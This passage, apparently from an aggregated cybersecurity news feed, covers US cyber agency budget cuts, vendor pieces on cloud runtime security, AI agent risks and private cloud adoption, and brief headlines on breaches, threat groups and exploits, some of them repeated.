spending outlays to drop by $535 million, or 20%. On the other hand, according to the budget, the much smaller Cyber Director’s budget should decrease by 10%, while personnel levels will stay level at 85 full-time equivalent employees. In addition to their own budget cuts, both officials will have to grapple with the fallout from reduced cyber functions across the entire federal government, from the NSA to the FBI. The FBI has recently been forced to divert resources from cybersecurity to handling immigration and border control issues. “This administration has decided to disinvest in cybersecurity and to do so in a way that is particularly damaging to the workforce,” Michael Daniel, president and CEO of the Cyber Threat Alliance, told CSO. “That’s being mirrored across the government. A lot of other agencies are also facing reductions.” He added: “Both of these individuals are going to be facing a lot of internal challenges of these cuts that have been made without necessarily a whole lot of analysis. They’re going to have holes in the workforce because it hasn’t been planned out.” Divergent strategies moving forward The road ahead appears paved with opportunity for Cairncross, while Plankey faces a narrower path of contraction and clean-up at CISA. “This is a perfect opportunity for the NCD [national cyber director] position to work,” Center on Cyber and Technology Innovation’s Montgomery said. “You have a National Security Council focused on the offensive side. You have CISA, which is focused on internally reorganizing itself. Cairncross is the first NCD to find himself in the position of having the running room to make the job work.” Montgomery emphasized, “Now is the time for Cairncross to very pointedly and aggressively go work to establish the NCD’s role as the coordinator of domestic cyber incident response to ensure that federal agencies are executing the president’s policies and budget and appropriations properly, and to work with the Hill to get whatever authority and appropriation changes are needed.” Plankey, on the other hand, is going to have to look inward to reorganize a reduced and demoralized agency. “He’s not going to be able to change the administration’s mind in the short term about reducing the overall size of CISA,” Cyber Threat Alliance’s Daniel said. “That’s not going to happen. He’s going to have to take that as a given.” Daniel advised, “He should try to say [to the President], ‘Okay, give me the latitude to get to the targets you want, but let me work with the CISA leadership. Let me work with [Homeland Security Secretary Kristi Noem]. Let me figure out how to get there.’” One certainty for both agencies is that “neither of them is going to get the opportunity to fix the influence operations problem,” Montgomery said. “We have China, Russia, and Iran running aggressive influence operations against us. For whatever reason, the Trump administration has decided that it’s censorship of Republicans. That is a false analogy, but it’s taken root. Not much we can do about it.” Despite the sunny prospects for Cairncross and the hope that Plankey can stop CISA’s downward spiral, it’s also clear that the current government’s cybersecurity policy environment is uncharted territory.   “It’s a very, very different environment than anybody that’s been working in cyber for the last 20 years has faced,” Daniel said. “We haven’t seen a government or private sector company that has said, ‘We’re going to walk away from a lot of the cyber capability and disinvest in it and abandon that capability.’ We just haven’t seen that.”

Workday has presented new developer tools to help enterprises connect its HR and finance software with external agents. The tools are an extension of the company’s Illuminate agentic AI platform, and include the Agent Gateway, AI Widgets, and expanded AI Gateway APIs. Illuminate, rolled out in September 2024, is intended to accelerate common tasks such as writing knowledge-based text, job descriptions, or contracts, providing real-time AI assistance within workflows, and making a “team” of AI experts available to users. The models behind it are powered by the 800 billion business, HR, and financial transactions made by Workday customers annually.

Cloud security teams are caught in an endless cycle. Every day, they sift through alerts, investigate misconfigurations, and analyze theoretical risks. Stymied by information-processing, their nemesis – hackers – don’t wait. Cyber criminals move fast, exploiting live environments while security teams remain buried in posture management and pre-deployment security checks. The problem? “Most cloud security strategies focus on what could go wrong, not what is going wrong right now,” said Bryan Kissinger, PhD, CISO and SVP of Security Solutions at Trace3. “Posture management tools (CSPM) highlight misconfigurations but don’t detect active threats. Shift-left security helps reduce vulnerabilities in development, but once workloads are running, security teams often lose visibility,” Kissinger and his team at Trace3 are seeing trends of attackers exploiting identity constructs, moving laterally across cloud environments, and escalating privileges—without triggering traditional alerts. Why traditional cloud security falls short While incredibly valuable, posture management solutions focus on misconfigurations and potential impact analysis. “Traditional CSPM solutions tell teams where there could be threats. Whether in code or in the cloud, there are too many potential indicators of risk to answer one simple question, ‘what do we need to fix today?’” Kissinger said. Without runtime security, teams spend time investigating theoretical risks while real threats lurk undetected. Why runtime security is a CNAPP essential Runtime security shifts cloud defense from “what might happen” to “what’s happening now.” Instead of alerting teams about a possible misconfiguration that could be exploited, it detects initial access and actual exploitation attempts in real time. Here’s why runtime security is critical: Real-time threat detection and runtime signals – Identifies active exploits as they happen, not after they’ve caused damage.     Lateral movement visibility – Detects attackers moving laterally through cloud environments. Identity and privilege abuse monitoring – Identifies misuse of cloud identities and permissions. Correlation of risks and live attacks – Prevents alert fatigue by connecting threats to meaningful attack paths. Security isn’t just about hardening an environment; it’s about defending it while running. How Wiz delivers runtime security Wiz bridges the prevention-to-response gap with Wiz Defend, its Cloud Detection and Response (CDR/ADR) solution. Unlike traditional cloud posture management tools or runtime security tools built for securing endpoints, Wiz Defend: Detects cloud threats agentlessly in real-time across cloud, workload, Kubernetes, identity, and sensitive data layers, not just misconfigurations, reducing alert noise and prioritizing threats that represent a real risk.     Removes alert noise with vulnerabilities validated in runtime via an optional, lightweight eBPF sensor, in addition to unlocking real-time blocking, threat-hunting, and runtime forensic capabilities. Uses the Wiz Graph to correlate posture, identity, sensitive data, and developer activity with cloud & SaaS telemetry, threat intelligence, and runtime signals, giving teams a single source of truth for investigations and alert triage.                           Provides cloud-native response playbooks and one-click containment actions, so teams aren’t just alerted—they know how to respond and prevent potential incidents fast. By integrating runtime security into the CNAPP framework, Wiz ensures that security teams aren’t just managing posture—they’re actively detecting, preventing, and stopping threats. From posture to protection: Escaping the alert fatigue rabbit hole “Security teams are tired of chasing theoretical risks. Without runtime protection, they’ll continue triaging the endless stream of alerts, low-priority misconfigurations, and disconnected findings,” Kissinger said. A true CNAPP strategy isn’t just about prevention—it’s about continuous protection. See beyond static misconfigurations—detect live threats. Stop chasing alerts—correlate risk to real attack paths. Escape the noise—focus on what actually matters and address problems holistically. It’s time to stop hunting for problems and start securing what’s live. Wiz delivers cloud detection and response as part of its unified CNAPP, helping security teams protect their cloud environments and applications in real time. Want to see how Wiz Defend keeps runtime threats in check? Book a demo today. Or click here to speak with a Cloud Security expert and find out how Wiz can help.

The shift to cloud, SaaS, and hybrid work is no longer breaking news. What is surprising is how many IT and network teams are still trying to stitch together architectures that weren’t designed for today’s distributed world. Data is everywhere. Users are everywhere. Applications live across SaaS, public cloud, and private data centers. Yet too […] The post Why Architecture Still Wins: Making SASE & SD-WAN Work Without Compromise appeared first on Netskope.

The cybersecurity landscape is evolving rapidly, with two major forces reshaping how organizations think about user access: passwordless authentication and artificial intelligence (AI). While each technology offers significant security and usability improvements on its own, together, they present a compelling future for identity and access management. The Problem With Passwords Despite years of warnings, passwords… The post Passwordless Authentication and AI: A Look at Emerging Technologies appeared first on Portnox.

The group has been operating since at least 2017, initially breaching systems belonging to the Kurdistan Regional Government and have expanded their reach to the Central Government of Iraq as well as a telecommunications provider in Uzbekistan.

The group has been operating since at least 2017, initially breaching systems belonging to the Kurdistan Regional Government and have expanded their reach to the Central Government of Iraq as well as a telecommunications provider in Uzbekistan.

The group has been operating since at least 2017, initially breaching systems belonging to the Kurdistan Regional Government and have expanded their reach to the Central Government of Iraq as well as a telecommunications provider in Uzbekistan.

During Infosecurity Europe 2025, Nick Woodcraft, from the UK Government, shared his experience in implementing measures to protect domains within the .gov.uk DNS namespace

Learn how to spin up a GitHub Issue, hand it to Copilot, and get a draft pull request in the same workflow you already know. The post How to create issues and pull requests in record time on GitHub appeared first on The GitHub Blog.

Meet the minds behind how Microsoft prioritizes cybersecurity across every team and employee. The post Meet the Deputy CISOs who help shape Microsoft’s approach to cybersecurity: Part 3 appeared first on Microsoft Security Blog.

Harrods, Marks & Spencer, Adidas and more — why are retailers facing this wave of cyberattacks in recent months?

Cybersecurity researchers have flagged several popular Google Chrome extensions that have been found to transmit data in HTTP and hard-code secrets in their code, exposing users to privacy and security risks. "Several widely used extensions [...] unintentionally transmit sensitive data over simple HTTP," Yuanjing Guo, a security researcher in the Symantec's Security Technology and Response...

Explore how deception technology boosts IIoT security with early threat detection and protection for critical infrastructure. The post How Can Deception Technology Fortify Industrial IoT Networks Against Cyber Threats? appeared first on Fidelis Security.

Alleged breach of Slate & Tell – 5M Jewelry Customer Records Exposed

Engagement with ransomware actors doesn’t necessarily mean payment; it’s about getting the best outcomes, a leading negotiator had argued

In today's hyper-complex, cloud-driven IT landscape, visibility isn't just a buzzword – it's the bedrock of operational success. For IT management, the challenges are mounting: sprawling cloud environments, ephemeral workloads, and the relentless pace of change can make effective management feel like an uphill battle. Get the Sageable whitepaper, Modernizing Your CMDB for IT Operational Success, now. You know the traditional Configuration Management Database (CMDB) was a foundational technology for ITSM. But let's be honest, those legacy systems, built for a static, monolithic era, are struggling to keep up with the real-time demands of dynamic cloud-native applications. Manual updates, outdated data, and a lack of integration can turn your CMDB into a "system of record" that's hopelessly out of sync with your "system of action". But what if your CMDB could be more? What if it could be the central source of truth you desperately need for efficient capacity planning, robust security, and lightning-fast incident resolution in this new era? The good news is that the CMDB is experiencing a renaissance. Forward-thinking vendors are pouring innovation into next-generation IT discovery and CMDB solutions, designed from the ground up for modern IT environments. These aren't your old, clunky databases. We're talking about dynamic, intelligent platforms that leverage cutting-edge advancements.  The CMDB of today must offer: •    Real-time accuracy you can trust, eliminating the headaches of outdated information through intelligent automation. •    Proactive resilience, helping you anticipate and prevent issues before they impact your services. •    Accelerated incident management, empowering your teams with the precise insights needed for rapid detection, triage, and remediation. •    Enhanced security and compliance, giving you granular control and immediate visibility into your IT estate. •    Seamless integration with modern tools and methodologies, from DevOps to AIOps, ensuring your CMDB supports your strategic initiatives.  These transformative capabilities are already delivering significant results for organizations, leading to dramatic improvements in response times and substantial reductions in downtime. Ready to discover how a modern CMDB can revolutionize your IT operations and improve your services?Download our whitepaper, Modernizing Your CMDB for IT Operational Success, to explore the innovations driving this CMDB renaissance and learn how you can unlock visibility, efficiency, and resilience for your IT estate. The post Is your CMDB ready for the demands of today and the future? appeared first on OpenText Blogs.

The suspect, a native of the central Ukrainian city of Poltava, had been conducting cyberattacks since at least 2018, police said.

The suspect, a native of the central Ukrainian city of Poltava, had been conducting cyberattacks since at least 2018, police said.

iVerify recently published a detailed technical analysis uncovering a new iMessage vulnerability — dubbed “NICKNAME” — that could be used in a zero-click attack to compromise iOS devices. The exploit abuses the way iOS handles iMessage contact profile updates (nicknames) to trigger memory corruption and potentially deliver spyware without any user interaction. What We Know […] The post NowSecure Responds to ‘NICKNAME’ iMessage Exploit appeared first on NowSecure.

Alleged breach of Odoo S.A. – Full Employee Database (63.4MB) for Sale at $25,000

The retail sector is undergoing a digital transformation. From loyalty apps to online storefronts and data-driven advertising campaigns, retailers are leveraging technology to better understand, serve, and retain their customers. But with great data comes great responsibility—and unfortunately, growing vulnerability. Cyberattacks against the retail industry are rising at an alarming rate. In fact, recent industry… The post The Perfect Target: Why Retail Cyberattacks Are on the Rise appeared first on Portnox.

ConnectWise issued a patch to stave off attacks on ScreenConnect customers, but the company's disclosures don't explain what the vulnerability is and when it was first exploited.

Quantum Computing may enable communications that do not travel across a network in the conventional sense and endanger traditional encryption methods, carrying critical implications for lawful intelligence. The post Implications of Quantum Processing for Lawful Intelligence appeared first on SS8.

Amodei says AI "too fast" for blanket law ban; sees fundamental world change in 2 years.

Someone went to great lengths to prey on the next generation of cybercrooks Sophos thinks a single person or group called "ischhfd83" is behind more than a hundred backdoored malware variants targeting novice cybercriminals and video game cheaters looking to get their hands on malicious code.

A panel of CISOs at Infosecurity Europe urged their peers to use risk management and clear communication to tame a chaotic cyber landscape

The hacker group has breached hundreds of organizations and is working with others to exploit flaws in a popular remote support tool.

The hacker group has breached hundreds of organizations and is working with others to exploit flaws in a popular remote support tool.

Designing a security-focused Windows Service? Learn more from ThreatLocker about the core components for real-time monitoring, threat detection, and system hardening to defend against malware and ransomware.

Designing a security-focused Windows Service? Learn more from ThreatLocker about the core components for real-time monitoring, threat detection, and system hardening to defend against malware and ransomware.

Cybersecurity experts warn of widespread data exposure as a recent investigation reveals a staggering number of internet cookies…

Both companies have faced controversy in recent years, primarily for their work in circumventing mobile device security features The post Cellebrite to acquire mobile testing firm Corellium in $200 million deal appeared first on CyberScoop.

Both companies have faced controversy in recent years, primarily for their work in circumventing mobile device security features The post Cellebrite to acquire mobile testing firm Corellium in $200 million deal appeared first on CyberScoop.

The Surveyor open source tool can help organizations establish a baseline of their environment, verify activity, and investigate anomalies.

The rule has exposed companies to liability risks while failing to provide investors with “decision-useful” information, the coalition said in a recent letter.

The rule has exposed companies to liability risks while failing to provide investors with “decision-useful” information, the coalition said in a recent letter.

“Our national security depends on a resilient and secure energy grid,” said Sen. John Hickenlooper, D-Colo. Experts say the new effort would be welcomed by the private sector.

“Our national security depends on a resilient and secure energy grid,” said Sen. John Hickenlooper, D-Colo. Experts say the new effort would be welcomed by the private sector.

The US can't afford to wait for political consensus to catch up to technological change.

Sophisticated nation-state and cybercriminal groups are using insiders to infect targets via hardware devices, despite a lack of reporting of this threat

Compliance isn’t optional. But it’s never been more complex. The rise of containers has revolutionized modern infrastructure—enabling faster innovation and greater scalability. But with this transformation comes a new wave of compliance challenges. PCI DSS 4.0 introduces stricter requirements for both vulnerability management and file integrity monitoring (FIM) in dynamic environments like Kubernetes and containerized […]

In April, Anthropic’s CISO made an eye-opening prediction: within the next year, AI-powered virtual employees with corporate credentials will begin operating across the enterprise. These agents won’t just support workflows — they’ll become part of the workforce. The business case is obvious: AI agents promise scalable automation, reduced overhead, and tireless productivity. Salesforce is already making this a reality, recently introducing AI “digital teammates.” AI agent deployments are expected to grow 327% during the next two years, but from the vantage point of cybersecurity, this evolution introduces a volatile mix of innovation and risk. We’re not just giving software system access — we’re giving identity, autonomy, and decision-making capabilities. That changes how organizations approach security entirely. Autonomous, credentialed, and vulnerable Let’s be clear: These AI agents are not tools in the traditional sense. Unlike conventional automation or service accounts, these agents act as authenticated users operating under corporate credentials, making decisions, interacting with systems and data, and in some cases, executing sensitive tasks. That means they will have the same access and arguably pose the same risks as a human employee. But unlike humans, AI agents don’t understand context, intent, or consequences the way we do. They can be tricked, manipulated, or coerced through techniques like prompt injection or adversarial inputs. We’ve long accepted that humans are the weakest link in security—phishing and social-engineering schemes prey on our psychology—but AI agents introduce an even softer target: They take things at face value, don’t call the help desk, and operate at machine speed. Once compromised, they could serve as a persistent, high-bandwidth attack surface buried deep inside an organization’s environment. Rethinking security in the AI age Traditional security tools have been designed around human behavior: logins, passwords, and access/privilege levels. AI employees break these assumptions. Non-human identities, which already far outnumber human users, are becoming the dominant force in cloud environments. As cloud investments continue to skyrocket, citing AI as the top driver, and more AI agents are deployed in the cloud, organizations must turn towards a new age of AI security tools that can properly secure all that AI has to offer, specifically questions around: What level of autonomy and authority will AI agents have inside the enterprise? How do you monitor privilege activity and detect deviations? Can these agents be exploited or jailbroken via prompt injection or adversarial inputs? What data are these agents being trained on? The next insider threat AI introduces new, unproven components to your application stack – infrastructure, models, datasets, tools and plugins. And now, AI innovation is accelerating even faster with the introduction of agents. Unlike LLMs, agents reason, act autonomously, and coordinate with other agents. AI agents will have continuous access, won’t sleep or take vacations, and can be deployed at scale across multiple departments. This is bringing new complexity to organizations’ environments and introduces new security risks. One compromised agent could potentially do more damage in minutes than a malicious insider might accomplish in months. AI employees may soon rival, or exceed, insiders as the most dangerous threat vector. OWASP recently published its Agentic AI Threats and Mitigation highlighting emerging threats such as prompt injection, tool misuse, identity spoofing and more. Even more so, recent research from Unit 42 found prompt injection remains one of the most potent and versatile attack vectors, capable of leaking data, misusing tools, or subverting agent behavior. We’ve spent years building defenses around the human element. Now we must turn that same, or even fiercer, rigor toward the machines acting in our name. Taking action Palo Alto Networks recently introduced Prisma AI Runtime Security (AIRS) designed to help organizations discover, assess, and protect every AI app, model, dataset, and agent in their environment. With Prisma AIRS, organizations receive a comprehensive platform that provides: AI Model Scanning – Safely adopt AI models by scanning them for vulnerabilities. Secure your AI ecosystem against risks, such as model tampering, malicious scripts, and deserialization attacks. AI-Security Posture Management – Gain insight into security posture risks associated with your AI ecosystem, such as excessive permissions, sensitive data exposure, platform misconfigurations, access misconfigurations, and more. AI Red Teaming – Uncover potential exposure and lurking risks before bad actors do. Perform automated penetration tests on your AI apps and models using our Red Teaming agent that stress tests your AI deployments, learning and adapting like a real attacker. Runtime Security – Protect LLM-powered AI apps, models, and data against runtime threats, such as prompt injection, malicious code, toxic content, sensitive data leak, resource overload, hallucination, and more. AI Agent Security – Secure agents (including those built on no-code/low-code platforms) against new agentic threats, such as identity impersonation, memory manipulation, and tool misuse. As AI reshapes how enterprises operate and how attacks unfold, Prisma AIRS moves just as fast. Enterprises can confidently embrace the future of AI with Prisma AIRS. Read here how Palo Alto Networks Prisma AIRS, the world’s most comprehensive AI security platform is helping organizations secure all AI apps, agents, models and data.

Severity: Medium Advisory addresses a critical severity vulnerability in Cisco Identity Service Engine which could be exploited to allow a remote attacker to achieve high-level access Advisory addresses a critical severity vulnerability in Cisco Identity Service Engine Updated: 05 Jun 2025

The threat actor known as Bitter has been assessed to be a state-backed hacking group that's tasked with gathering intelligence that aligns with the interests of the Indian government. That's according to new findings jointly published by Proofpoint and Threatray in an exhaustive two-part analysis. "Their diverse toolset shows consistent coding patterns across malware families, particularly in...

You’re moments away from finishing a feature you’ve been working on for the last two weeks when you get a Slack notification that the frontend test pipeline has failed for the 824th time that year.  It’s the same handful of flaky tests that fail whenever there’s a half-moon. You make a note to fix these tests and get back to finishing that feature. We were in this situation and asked ourselves whether we enjoyed building and maintaining our frontend test system. The answer was no, so we tore it down and built something we could be proud of. Getting your frontend testing infrastructure stable is tough. Timing is tricky to get right when your tests are at the whim of network requests and browser rendering cycles. However, with the right tools and a solid foundation, you can do it, and it’s worth the effort. A promising testing pipeline isn’t just about catching issues; it’s a force multiplier for your development team, empowering them to move faster, confidently, and focus on doing their best work. In this post, we walk through why we switched from Cypress to Playwright, how we made the switch, and what the outcomes have been. What was […]

Anthropic says it has released a new set of AI models tailored for U.S. national security customers. The new models, a custom set of “Claude Gov” models, were “built based on direct feedback from our government customers to address real-world operational needs,” writes Anthropic in the blog post. Compared to Anthropic’s consumer- and enterprise-focused models, […]

A threat actor has been creating backdoored open source malware repositories to target novice cybercriminals and game cheaters. The post Backdoored Open Source Malware Repositories Target Novice Cybercriminals appeared first on SecurityWeek.

CyberScoop is first to report on the letter to DHS from the chair of a cybersecurity subcommittee, which also addresses CISA’s role as lead coordinator with the telecom sector. The post Rep. Garbarino: Ending CISA mobile app security program for feds sends ‘wrong signal’ appeared first on CyberScoop.

CyberScoop is first to report on the letter to DHS from the chair of a cybersecurity subcommittee, which also addresses CISA’s role as lead coordinator with the telecom sector. The post Rep. Garbarino: Ending CISA mobile app security program for feds sends ‘wrong signal’ appeared first on CyberScoop.

Malicious actors are making more use of AI in attacks, even as governments look to boost AI investments

Mais registreeris Riigi Infosüsteemi Amet (RIA) 1107 mõjuga intsidenti, mis ületas viimase kuue kuu keskmist. Peamiselt kasutajaandmete varastamiseks mõeldud õngitsuslehti avastati märtsis 336 ja erinevaid petulehti 371.

Explore how GenAI is reshaping enterprise operations and how to mitigate rising risks. The post GenAI's Impact — Surging Adoption and Rising Risks in 2025 appeared first on Palo Alto Networks Blog.

Employees in every organization use an average of 6.6 high-risk generative AI applications – including some unknown to CISOs — says Palo Alto Networks in a new study. But, an expert says, that estimate is low. “I think it’s probably worse,” said Joseph Steinberg, a cybersecurity and AI expert. “In a major company it’s got to be higher than that.” In fact, he predicts the number of risky AI apps in the enterprise is only going to grow. That means that CISOs need to do a risk assessment of every genAI app employees are using, he said in an interview, and then set policies and procedures staff have to follow. He warned CISOs and CEOs against following ‘the Ostrich algorithm’ – pretending the danger doesn’t exist by ignoring, if not rewarding, the shadow use of AI by employees, either in the office or at home. “There’s no question there’s a tremendous amount of use of generative AI apps being used in ways that are highly problematic for the organization,” he said. “Remember, I can use a genAI app from my personal computer that my company has no control over, and still leak a tremendous amount of data just from what I’m asking – and it may not be only what I’m asking, but what others are also asking, and the generative AI learns from the pattern of questions. “It’s hard to block that, because the risk can’t be completely controlled by the organization, because someone can do it on their own time from their own machine.” And organizations sometimes deliberately or inadvertently reward employees for using unapproved genAI apps, he added, for example, by applauding a report that’s just too good. “Let’s be honest,” he said. “Many of the companies that ban generative AI are rewarding their employees [for using it]. They’ll never admit it. But if you’re getting reviewed based on your performance, and your performance is enhanced by using shadow IT or AI on your own machine on your own time, if you’re not being punished, you’re not going to stop.” Steinberg was commenting on a study released Thursday by Palo Alto Networks (PAN) on the popularity of genAI in organizations. It analyzed traffic logs from just over 7,000 PAN customers during the 12 months of 2024 to detect use of software-as-a-service apps such as ChatGPT, Microsoft Copilot, Amazon Bedrock and more. It also included a separate look at anonymized data from its customers’ loss prevention incidents from the first three months of this year. It observed: on average, most organizations will see a total of 66 genAI apps in their environments. The bulk of those among PAN customers were “writing assistants” (34% of the sample. The biggest in this category was Grammarly); “conversational agents” (just under 29%, apps such as Microsoft Copilot, ChatGPT and Google Gemini); “enterprise search” apps  (just over 10% of the sample) and “developer platform” apps (just over 10%). These four alone make up 84% of the genAI apps seen; 10% of genAI apps are called ‘high-risk’ because, according to customer telemetry, access to them was restricted or blocked by customers at some point or points during the study period; data loss prevention (DLP) incidents for genAI detected by PAN more than doubled this year compared to 2024. Writing assistants aren’t applications to be taken lightly, the report warns. “If an AI writing assistant is integrated into an organization’s systems without proper security controls, it could become a vector for cyberattacks. Hackers could exploit weaknesses in the genAI app to gain access to internal systems or sensitive data.” “As genAI adoption grows, so do its risks,” it says. “Without visibility into genAI apps, and their broader AI ecosystems, businesses can risk exposing sensitive data, violating regulations, and losing control of intellectual property. Monitoring AI interactions is no longer optional. It’s critical for helping prevent shadow AI adoption, enforcing security policies, and enabling responsible AI use.” The report identifies these genAI security best practices for CISOs: understand genAI usage and control in the enterprise and what is allowed. Implement conditional access management to limit access to genAI platforms, apps, and plugins based on users and/or groups, location, application risk, compliant devices, and legitimate business rationale; guard sensitive data from unauthorized access and leakage through real-time content inspection with centralized policy enforcement across the infrastructure and within data security workflows to help prevent unauthorized access and sensitive data leakage; defend against modern AI-based cyberthreats through a zero trust security framework to identify and block highly sophisticated, evasive, and stealthy malware and threats within genAI responses.

The FBI is warning that the Silent Ransom Group (SRG) is targeting law firms with IT-themed social engineering attacks and callback phishing emails.

A phishing campaign is targeting European countries with lures themed around copyright infringement, researchers at Cybereason warn.

The need to combat global warming is leading to stricter governmental regulations and increased consumer demand for businesses to adopt environmentally friendly strategies and deliver sustainable products. That’s especially true in Europe. What does that mean for your company? If you’re planning to do business anywhere in the European Union (EU), you may have to deal with the Corporate Sustainability Reporting Directive (CSRD) and associated European Sustainability Reporting Standards (ESRS). Those regulations require certain companies with a presence in the EU to report their impact on the environment and society with the goal of having companies provide a positive contribution to the natural world and human systems. “I can see the potential environmental and financial benefits of people wanting to work with, support, and invest in a company dedicated to sustainability,” you say. Then, you look at what is required to comply: Environmental, Social, and Governance (ESG) reporting along your entire value chain. The process can be complex, resource-intensive, and time-consuming. It can require numerous mandatory disclosures, thousands of data points to collect and interpret, and key performance indicators (KPIs) to calculate. You take a deep breath and sigh – knowing those tasks will have to be done manually in your organization with limited resources, which can slow down reporting, increase errors, and raise compliance risks. CSRD.AI Manager to the rescue PricewaterhouseCoopers GmbH WPG Germany (PwC Germany), part of the PwC global professional services network, faced the same process challenge. In response, the organization developed a solution in partnership with SAP that’s also available to clients as well. The solution is called CSRD.AI Manager. Recipient of an SAP Innovation Award for 2025, CSRD.AI Manager employs automation in the form of artificial intelligence (AI) to make the reporting process easier, faster, and more accurate. “As with other organizations, we faced difficulties in interpreting thousands of data points and integrating diverse data sources, leading to inefficiencies,” observes Nico Reichen, a partner with PwC Germany. “The situation not only impacted our operational productivity but also affected workforce morale due to the manual tasks. We needed a streamlined, automated solution.” Creating an automatic winner with CSRD expertise and AI technology To develop the solution for its network and clients, PwC Germany turned to SAP, collaborating closely with the organization’s CSRD expert team and SAP Cloud’s technical development specialists. “The CSRD.AI Manager is an impressive example of how the collaboration between SAP and PwC can create a product that helps clients solve complex problems by adopting advanced technology such as AI,” Reichen notes. “In fact, artificial intelligence is the key component of our solution.” CSRD.AI Manager utilizes SAP AI Core components, as well as the Vector Engine from SAP HANA Cloud for text and embedding generation to automate report generation. SAP Datasphere, SAP Business Technology Platform (BTP), SAP Build Apps and SAP Analytics Cloud are also leveraged for AI-supported data collection and modeling and report visualization. It also integrates the PwC Germany CSRD-specific content with customizable data models to meet evolving compliance requirements. Taking the “sigh” out of ESG reporting All that expertise and technology adds up to a solution for successfully automating data collection, KPI calculations, and report generation, producing a variety of business, IT, and user benefits. CSRD.AI Manager: Enables comprehensive ESG reporting, supporting companies in meeting CSRD compliance requirements and promoting sustainable practices Improves efficiency with an automated, cloud-based solution that reduces data processing time and effort as well as the need for complex hardware infrastructure Automates many manual tasks, reducing errors and freeing employees to focus on strategic activities, while potentially lowering costs. Guarantees a seamless, compliant reporting process, enhancing client trust and satisfaction. Utilizes direct integration of the latest AI functionalities directly into existing IT systems AI-supported data collection automatically provides information on relevant data to answer regulatory questions in a targeted manner. Automated report generation uses extensive KPIs and data points to create an AI-supported report that provides the basis for compliant reporting. Enhances data security and integrity across the entire organization “CSRD compliance used to be a major drain on clients’ resources. But CSRD.AI Manager completely changed the game, automating the heavy lifting and freeing clients’ teams to focus on real sustainability improvements,” announces Benjamin Lösken, Director at PwC and Product Owner of the ESG, Reporting Manager – CSRD. A paragon of innovation In an era of increasing compliance demands, the CSRD.AI Manager provides an AI-driven long-term solution that ensures efficient, reliable, and audit-ready ESG reporting. For that achievement, PwC Germany was selected as the Winner of  the Partner Paragon award at the recent SAP Innovation Awards 2025 ceremony. The honor is given to partners who’ve developed a next-generation application deployed by customers that uses SAP BTP and is licensed by the SAP Build or Tech adoption program. Check out PwC Germany’s pitch deck for more information on a solution for your business.

Ett peppar, peppar något lugnare nyhetsflöde denna kortvecka men som oftast ett gäng matnyttiga fördjupningar att förkovra sig i.

The Greenhouse Gas Protocol?s Scope 2 revisions demand thoughtful action. Read how we?re prioritizing meaningful, measurable impact over rapid progress.

Fog computing vs. edge computing: Understand how they compare, their unique benefits, and which is best for your data processing needs in IoT and beyond.

In a world where code can neutralize a threat before the first missile is even launched, Space Force is betting big on systems to keep the upper hand in space without ever leaving the ground.

When your security tools trigger an alert, what happens next? For many security operations center (SOC) teams, the real work begins after the detection, in the investigation phase. You need to know not just that something happened, but what exactly happened and when, where, and how deeply the attack may have spread...

Fog computing vs. edge computing: Understand how they compare, their unique benefits, and which is best for your data processing needs in IoT and beyond.

Officials from His Majesty's Revenue & Customs, the U.K.'s tax authority, said criminals took over accounts to pilfer £47 million ($63 million) last year.

Officials from His Majesty's Revenue & Customs, the U.K.'s tax authority, said criminals took over accounts to pilfer £47 million ($63 million) last year.

Learn more about our commitment to business continuity, operational resilience, and environmental responsibility. The post Building Trust, Advancing Resilience: Commvault’s FY25 Sustainability Report appeared first on Commvault - English - United States.

The enterprise cloud narrative is undergoing a fundamental shift. After years of public cloud evangelism, IT leaders are orchestrating what Broadcom’s latest research aptly terms a “cloud reset”—a strategic recalibration that positions private cloud as tomorrow’s strategic imperative. The numbers tell a compelling story. According to Broadcom’s inaugural “Private Cloud Outlook 2025: The Cloud Reset” report, which surveyed 1,800 senior IT decision-makers globally, 93% of enterprises now balance a hybrid mix of private and public cloud environments. More striking still, 69% are actively considering repatriating workloads to private cloud, with 35% having already executed this strategic shift. This isn’t cloud repatriation driven by the failure of public cloud migration—it’s optimization driven by the need for security, simplicity, and cost control. The security awakening Security concerns are propelling this transformation. The research reveals that 92% of enterprises trust private cloud for security and compliance, while 49% cite data privacy and security concerns as their primary worry about public cloud. These aren’t abstract fears. Data loss and leakage and data privacy and confidentiality remain the top security concerns in cloud computing, according to recent industry studies. Security-sensitive applications lead the repatriation trend, followed by data-intensive applications. What’s particularly noteworthy is that modern, cloud-native workloads are as likely to be repatriated as traditional applications, debunking the myth that only traditional applications return to private infrastructure. The cost reality check Financial predictability is the second pillar driving private cloud adoption. Broadcom’s research found that 94% of enterprises believe some of their public cloud spend is wasted, with nearly half (49%) estimating that more than a quarter of their public cloud expenditure delivers no value. Even more concerning, 31% believe waste exceeds 50% of their cloud budget. This cost unpredictability stems from the complexity inherent in public cloud pricing models and the unmanageability of hundreds of consumption meters.  As per the IDC blog, about half of cloud buyers spent more on cloud than they expected in 2023, with 59% predicting similar cost overruns during 2024. In contrast, 90% of organizations value the financial visibility and cost predictability that private cloud environments provide as per the Broadcom study. These statistics illustrate the beliefs–and realities–that are driving enterprises to private cloud. The strategic repositioning Enterprise cloud strategies are evolving beyond the binary public-versus-private debate toward intentional workload placement. Organizations are no longer asking “cloud or no cloud” but rather “which cloud for which workload.” This strategic maturity recognizes that different applications have different requirements for security, compliance, performance, and cost optimization. The data supports this shift toward intentionality. Fifty-three percent of enterprises plan to build new workloads in private cloud environments, indicating that private cloud isn’t just about repatriating existing applications—it’s about strategic future deployment decisions. The 84% of enterprises running both traditional and cloud-native applications in private cloud demonstrate that modern private infrastructure has achieved the agility and self-service capabilities that were once exclusive to public cloud platforms. The AI catalyst Generative AI is accelerating private cloud adoption. Organizations eager to harness AI capabilities face significant hurdles around data privacy and skill shortages. Private cloud environments offer the data residency, security controls, and governance frameworks necessary for enterprise AI deployment while maintaining compliance with increasingly stringent data protection regulations. Overcoming implementation challenges Success in this cloud reset requires organizations to address organizational challenges. IT teams must overcome traditional silos and skill gaps that have historically hindered private cloud deployments. Restructuring teams into platform level teams and enhancing in-house expertise are critical steps for realizing private cloud’s full potential. The path forward The cloud reset represents a maturation of enterprise IT strategy. Organizations are moving from cloud enthusiasm to cloud optimization, driven by real-world experience with security vulnerabilities, cost overruns, and compliance requirements. This shift doesn’t represent a rejection of public cloud but rather an embrace of strategic cloud deployment. The most successful organizations will be those that deploy workloads based on specific requirements rather than broad assumptions about cloud superiority. Private cloud has evolved far beyond its legacy reputation. Modern private cloud platforms offer the self-service capabilities, automation, and agility that enterprises demand while providing the security, compliance, and cost predictability that public cloud often cannot guarantee. The cloud reset is here. Organizations that recognize private cloud as a strategic 